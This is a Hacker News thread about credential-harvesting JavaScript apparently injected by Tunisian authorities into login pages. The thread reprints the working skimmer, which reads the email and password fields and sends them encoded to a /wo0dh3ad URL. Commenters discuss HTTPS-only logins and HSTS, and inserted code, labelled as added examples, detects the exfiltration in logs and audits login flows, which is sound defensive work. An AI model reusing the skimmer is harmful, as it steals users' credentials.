

Http://www.google.com/wo0dh3ad - SimplePast

This is the function used by Tunisia Gov agencies to harvest login/passwords:
see also http://www.thetechherald.com/article.php/201101/6651

<script language="javascript">
<!--
function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {var frm = document.getElementById("gaia_loginform"); var us3r = frm.Email.value; var pa55 = frm.Passwd.value;
 var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);
 var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}
//-->
</script>
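
For responders who have proxy or web-server logs (the point Jabbles raises further down), the useful thing to know about the injected script is its encoding: h6h() turns every byte of the username and password into two letters, high nibble plus 97 and low nibble plus 97, so a captured value is made only of the letters a to p and has even length, and the request goes to /wo0dh3ad with a random five-letter q parameter. The following is an added example, not code from the thread: it reverses that encoding and scans constructed log lines in a hypothetical "<client> <method> <url>" format to list which accounts were captured. The password field is only flagged, never decoded, so the report can be circulated to affected users without spreading the secret.

```javascript
// Added example (not from the thread): decode the "h6h" nibble encoding used by the
// injected script and scan constructed log lines for its exfiltration requests.
// Each byte becomes two letters: (high nibble + 97) then (low nibble + 97), i.e. 'a'..'p'.

const EXFIL_PATH = '/wo0dh3ad';   // request path taken from the injected script
const NIBBLE_RE = /^[a-p]+$/;     // only letters a..p can come out of h6h()

// Reverse of h6h(): pairs of letters a..p back to the original characters.
// Returns null when the input could not have been produced by h6h().
function decodeH6h(encoded) {
  if (encoded.length === 0 || encoded.length % 2 !== 0 || !NIBBLE_RE.test(encoded)) {
    return null;
  }
  let out = '';
  for (let i = 0; i < encoded.length; i += 2) {
    const hi = encoded.charCodeAt(i) - 97;
    const lo = encoded.charCodeAt(i + 1) - 97;
    out += String.fromCharCode((hi << 4) | lo);
  }
  return out;
}

// True when a value looks like h6h() output, without decoding it.
function looksEncoded(value) {
  return value.length > 0 && value.length % 2 === 0 && NIBBLE_RE.test(value);
}

// Inspect one log line in the hypothetical format "<client> <method> <url>".
// Returns a report object for an exfiltration request, or null otherwise.
function inspectLogLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 3) return null;
  const [client, method, rawUrl] = parts;
  let url;
  try { url = new URL(rawUrl); } catch (e) { return null; }
  if (url.pathname !== EXFIL_PATH) return null;
  const u = url.searchParams.get('u');
  const p = url.searchParams.get('p');
  if (u === null || p === null) return null;
  const user = decodeH6h(u);
  if (user === null) return null;            // not the script's encoding, ignore
  return {
    client,
    method,
    host: url.host,
    user,                                     // decoded so the account can be warned
    passwordCaptured: looksEncoded(p),        // flagged only, never decoded here
  };
}

function scanLog(lines) {
  return lines.map(inspectLogLine).filter(r => r !== null);
}

// Constructed sample lines: one exfiltration request for bob@example.com,
// one ordinary search request, and one malformed request to the same path.
const SAMPLE_LOG = [
  '10.0.0.5 GET http://www.google.com/wo0dh3ad?q=kzqwe&u=gcgpgceagfhigbgnhagmgfcogdgpgn&p=gihfgohegfhcdc',
  '10.0.0.7 GET http://www.google.com/search?q=weather',
  '10.0.0.9 GET http://www.google.com/wo0dh3ad?q=abcde&u=not%20encoded&p=x',
];

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

Run it with node; the output lists a single hit from 10.0.0.5 with the decoded user bob@example.com and passwordCaptured set to true, while the search request and the malformed request are skipped.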
======
mike-cardwell
This is why login forms themselves must be opened over an HTTPS connection.
Displaying a login form over HTTP which POSTs to HTTPS is easily MITMd.

Think of your users. Some of them will be accessing your sites from oppressive
regimes. Let them do so safely.

Taking Facebook as an example, considering how global their usage is, and the
amount of sensitive data people's accounts contain, it's unforgivable that they
don't force HTTPS traffic for everything.

~~~
saurik
Unfortunately, that is easily defeated by modifying all non-SSL pages on the
site to link to a non-SSL login page look-alike (which is easily generated by
downloading the real one over SSL and forwarding it decrypted). I don't see
any reasonable way to solve this other than /always/ using SSL for your site.

------
thamer
Slim Amamou, who is named in the article as the one who discovered this code,
has been arrested. His phone is still updating his Google Latitude position,
moving between several government buildings.

[http://advocacy.globalvoicesonline.org/2011/01/07/tunisia-bl...](http://advocacy.globalvoicesonline.org/2011/01/07/tunisia-blogger-slim-amamou-arrested-today/)

------
bensummers
Story behind this: [http://cpj.org/internet/2011/01/tunisia-invades-censors-face...](http://cpj.org/internet/2011/01/tunisia-invades-censors-facebook-other-accounts.php)

------
Jabbles
_Fortunately, because the fake "wo0dh3ad" page accessed was on their site,
Facebook may well have a log of everyone whose account was compromised and can
take steps to warn and protect their Tunisian users._

Why would the Tunisian government have allowed ISPs to forward these requests?
Facebook probably knows nothing about this.

------
wladimir
Proves again that there is really no excuse not to use HTTPS for everything.

Encryption/certificate validation make it much harder to pull off a MITM attack
like this, especially by companies and small repressive governments.

~~~
iuguy
The simple answer for small repressive governments is to block the HTTPS login
form so you have to fall back to HTTP. ATI has complete control of all
Internet access in Tunisia. You're just not going to get through them unless
you can find a way through.

In some countries I work in we routinely come across censorship and all kinds
of dodgy goings on, so we have a variety of tunnelling methods (VPN, SSH,
ICMPTX, DNSTX, Tor and a few non-public tunnelling options). For the most part
as long as you can terminate a connection in somewhere you're fairly
comfortable with you're better off.

Also don't make the mistake of feeling that the US, UK or EU are automatically
comfortable options. It all depends what you're doing with the data. A little
common sense goes a long way.

~~~
wladimir
Of course, governments can completely block port 443, but that will make so
many internet sites unusable they could just as well completely pull the plug.

And with 'HTTPS everywhere', I also mean removing the HTTP fallback. Fallbacks
to plaintext (that can be triggered by a MITM) are indeed obvious backdoors
that should be avoided in any protocol.
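
The points made in this subthread (the login page itself must be served over HTTPS, not just the form's POST target; same-site links that drop back to HTTP give an interceptor a page to modify; and plaintext requests must be redirected rather than answered, with no HTTP fallback) can be written down as a check that is run against a site's responses. The following is an added example, not code from the thread: it audits a pair of constructed responses (the answer to a plaintext request and the login page the user actually receives) for those properties, and additionally looks for a Strict-Transport-Security header, the HSTS mechanism from RFC 6797 by which a site tells browsers to refuse plaintext for it in future, which is how "removing the HTTP fallback" is made to stick on the client side. The sample responses, hostnames and the response object shape are constructed for the demo.

```javascript
// Added example (not from the thread): audit a login flow for plaintext exposure.
// A "response" here is a constructed object { url, status, headers, body }.

// Case-insensitive header lookup over a plain object of headers.
function headerOf(resp, name) {
  const headers = resp.headers || {};
  for (const key of Object.keys(headers)) {
    if (key.toLowerCase() === name.toLowerCase()) return headers[key];
  }
  return null;
}

// Collect the values of one attribute on one tag, e.g. all <form action="..."> targets.
function extractAttr(html, tag, attr) {
  const re = new RegExp("<" + tag + "\\b[^>]*\\b" + attr + "\\s*=\\s*[\"']([^\"']*)[\"']", "gi");
  const values = [];
  let m;
  while ((m = re.exec(html)) !== null) values.push(m[1]);
  return values;
}

// Returns a list of findings; an empty list means the flow passed every check.
function auditLoginFlow(site) {
  const findings = [];
  const { plainRequest, loginPage } = site;

  // 1. A plaintext request must be redirected to HTTPS, never answered with content.
  const location = headerOf(plainRequest, 'location') || '';
  const redirected = plainRequest.status >= 300 && plainRequest.status < 400 &&
                     location.startsWith('https://');
  if (!redirected) findings.push('HTTP request served content instead of redirecting to HTTPS (plaintext fallback)');

  // 2. The login page itself must arrive over HTTPS; a POST-to-HTTPS form on an HTTP page is not enough.
  const page = new URL(loginPage.url);
  if (page.protocol !== 'https:') findings.push('login page loaded over ' + page.protocol);

  // 3. Every form must post to HTTPS (relative actions are resolved against the page URL).
  for (const action of extractAttr(loginPage.body, 'form', 'action')) {
    const target = new URL(action, page);
    if (target.protocol !== 'https:') findings.push('form posts to ' + target.href);
  }

  // 4. Same-site links back to HTTP hand an interceptor a page it can rewrite.
  for (const href of extractAttr(loginPage.body, 'a', 'href')) {
    const target = new URL(href, page);
    if (target.protocol === 'http:' && target.hostname === page.hostname) {
      findings.push('same-site link falls back to HTTP: ' + target.href);
    }
  }

  // 5. HSTS (RFC 6797) makes the browser refuse plaintext for this host from now on.
  const hsts = headerOf(loginPage, 'strict-transport-security');
  if (!hsts || !/max-age=\d+/i.test(hsts)) findings.push('no Strict-Transport-Security header');

  return findings;
}

// Constructed sample 1: login form served over HTTP that posts to HTTPS, plus an HTTP help link.
const WEAK_SITE = {
  plainRequest: { url: 'http://www.example.com/login', status: 200, headers: { 'Content-Type': 'text/html' },
                  body: '<form action="https://www.example.com/login" method="post"></form>' },
  loginPage:    { url: 'http://www.example.com/login', status: 200, headers: { 'Content-Type': 'text/html' },
                  body: '<form action="https://www.example.com/login" method="post">' +
                        '<input name="email"><input name="passwd" type="password"></form>' +
                        '<a href="http://www.example.com/help">Help</a>' },
};

// Constructed sample 2: plaintext redirected, page and form on HTTPS, HSTS set.
const HARDENED_SITE = {
  plainRequest: { url: 'http://www.example.com/login', status: 301,
                  headers: { Location: 'https://www.example.com/login' }, body: '' },
  loginPage:    { url: 'https://www.example.com/login', status: 200,
                  headers: { 'Strict-Transport-Security': 'max-age=31536000; includeSubDomains' },
                  body: '<form action="/login" method="post">' +
                        '<input name="email"><input name="passwd" type="password"></form>' +
                        '<a href="/help">Help</a>' },
};

console.log('weak:', auditLoginFlow(WEAK_SITE));
console.log('hardened:', auditLoginFlow(HARDENED_SITE));
```

The weak sample produces four findings (plaintext fallback, page over http:, HTTP help link, no HSTS) even though its form posts to HTTPS, which is exactly the setup mike-cardwell describes as easily intercepted; the hardened sample produces none.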

------
pavel_lishin
So, is pornography actually illegal in Tunisia, or is this a case of "Well, we
just don't like it when you do it."?

~~~
eli
I'm not sure there's a big distinction under an authoritarian regime.

